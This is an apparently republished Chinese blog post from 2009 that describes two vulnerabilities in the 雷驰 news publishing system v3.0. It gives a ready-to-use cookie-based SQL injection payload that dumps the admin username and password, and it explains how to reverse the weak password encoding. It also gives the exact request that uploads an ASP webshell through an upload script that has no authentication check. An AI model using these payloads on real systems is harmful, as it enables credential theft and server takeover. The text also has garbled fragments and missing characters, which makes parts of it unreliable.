专注于互联网--专注于架构

最新标签
网站地图
文章索引
Rss订阅

首页 »安全 » 雷驰显卡:雷驰新闻发布管理系统v3.0漏洞很简单 »正文

雷驰显卡:雷驰新闻发布管理系统v3.0漏洞很简单

来源: 发布时间:星期六, 2009年9月12日 浏览:26次 评论:0
来源:安全中国

个就是得到管理员密码和用户名
在http://127.0.0.1/otype.asp?owen1=文体新闻
加上下面段COOKIES
owen2=娱乐新闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='
(注意要转换)直接得到管理员用户名和密码
其密码简单加密了位加1第 2位加2第5位加5
如果密码本来是aaaaa那么加密出来就是bcdef
如果加密后密码是fffff那么原来密码就是edcba

第 2个漏洞直接得到WEBSHELL
后门有个上传图片里面段代码是这样
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
…………
 actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))

…………
end 
file.SaveAs Server.mappath(formPath&remFileName)

提交地址改成
/admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123
就可以直接上传个马了

第 2个漏洞问题很严重uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆

意思就是说步都可以省略了来搞汗~~~~

我主要就是想介绍说明问题就是
这个漏洞太大了而且利用太简单了而已



  • 篇文章: Radmin软件Software次提权窍门技巧

  • 篇文章: PHP难吗?PHP脚本注入简单步骤
  • 0

    相关文章

    读者评论

    发表评论

    • 昵称:
    • 内容: